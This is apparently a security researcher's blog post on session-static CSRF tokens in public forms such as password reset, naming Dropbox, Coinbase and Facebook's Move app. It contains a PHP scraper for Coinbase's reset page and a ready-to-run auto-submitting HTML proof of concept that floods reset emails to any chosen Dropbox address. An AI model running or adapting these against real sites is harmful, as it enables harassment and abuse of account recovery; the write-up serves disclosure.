Cross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious Web site, email, blog, instant message, or program causes a user’s Web browser to perform an unwanted action on a trusted site for which the user is currently authenticated. – Wikipedia
I had an interesting encounter with CSRF last week , one of them is yet to be fixed. Here is an interesting low impact issue
These days almost every form on a website use CSRF protection by default. Every time website load , CSRF token should be different/unique/unpredictable . But this is not the case with 80% of websites out there. I’ll be explaining this two examples one is Dropbox and other is move-app(Facebook)
Let’s start.
Most of the dynamic website contain Sign in functionality as well as forgot password to recover the account.
“Most of the forgot password forms are vulnerable by design , a good practice is to ask a security question before sending reset link” – Aditya
My area of interest was CSRF token for the visitors , public forms like reset password ,sign in ,feedback and all. These tokens are session based (when the site load session started till you close the browser).
The issue was token remains same for a particular session . For e.g when you submit reset password request first time , token is x, now every time you request areset password token will be same x.
I thought to abuse this , I made a PHP crawler that will crawl the hidden CSRF value and thought to add token field with my CSRF form . here is the PHP code to extract all the input values from Coinbase.
<?php
$doc = new DOMDocument();
@$doc->loadHTMLFile(“https://www.coinbase.com/password_resets/new”);
$doc->saveHTML();
$tags = $doc->getElementsByTagName(‘input’);
foreach ($tags as $tag) {
$x= $tag->getAttribute(‘value’).’|’.$tag->nodeValue.”\n”;
echo $x;
}
?>
I tried to submit my form by scrapped CSRF token , badass idea. Didn’t worked , because my page was not creating any session.
Now , the goal was clear I have to use my session to abuse the CSRF. So, what I did is copied my cookie and token and used cookie with document.cookie and token value, this time Bingo !.
In the case of Dropbox , they have js_csrf key in cookie which contain the value of CSRF . A full POC for dropbox is here. Go to the forgot password page , copy the cookie and token now replace cookie with your cookie and token with your token and use it as long as you don’t close the browser.
<html>
<head><title>test</title></head>
<body>
<script>
document.cookie=”locale=en; gvc=MjY5NTY5NDI1ODg1MjkwOTc5MjU4MTMwMDAwMjQzNTA1ODg0NDM%3D; t=JK3SHAeVr2aKEoysoY5vSTOZ; js_csrf=AI2FTNdJcwJ9rgv-uA_Um_Bi; _ga=GA1.2.1136221818.1422608131; _dc_gtm_UA-279179-2=1; __ar_v4=D33PO2KM7ZEHNI2NW5CGWR%3A20150201%3A4%7C56766LR465ARRDJLPT63JW%3A20150201%3A4%7CU7C3RGPYVFBRPNTVQLPXAB%3A20150201%3A4; _gali=page-content”
</script>
<form action=”https://www.dropbox.com/forgot” method=”post” name=”manish”>
<input type=”hidden” name=”t” value=”AI2FTNdJcwJ9rgv-uA_Um_Bi” />
<input type=”hidden” name=”confirm” value=”go” id=”action” />
<input type=”hidden” name=”is_reset” value=”False” id=”action” />
<input type=”hidden” id=”pyxl4173474534052041227″ name=”email” value=”xyz@gmail.com” />
</form>
<script>
document.manish.submit();
</script>
</body>
</html>
CSRF token is stored in cookie, change the email field to any known email associated with the dropbox and every time you reload this page, they will get a reset link.
In case of move app , there were no csrf field in cookie but token was cookie based. Same POC will work for move as well accept they don’t store a CSRF field in cookie.
so what’s the big deal ? I can use my session to abuse CSRF protection in this case and send number of reset link (burp repeater is other option but burp have some setting issue with most RoR applications)
Dropbox ,Facebook,Asana,coinbase and lot more have confirmed the issue but they said this is low priority . They did won’t fix and I went down few ranks on Hackerone.
The issue is with almost 80% of websites ,most of them say either they have rate limiting scheme. Then why is CSRF protection used ?
Hackerone’s implementation is standard CSRF token implementation , every time a page load you get a new CSRF token .Any other possibility to abuse this ?
@umenmactech
as
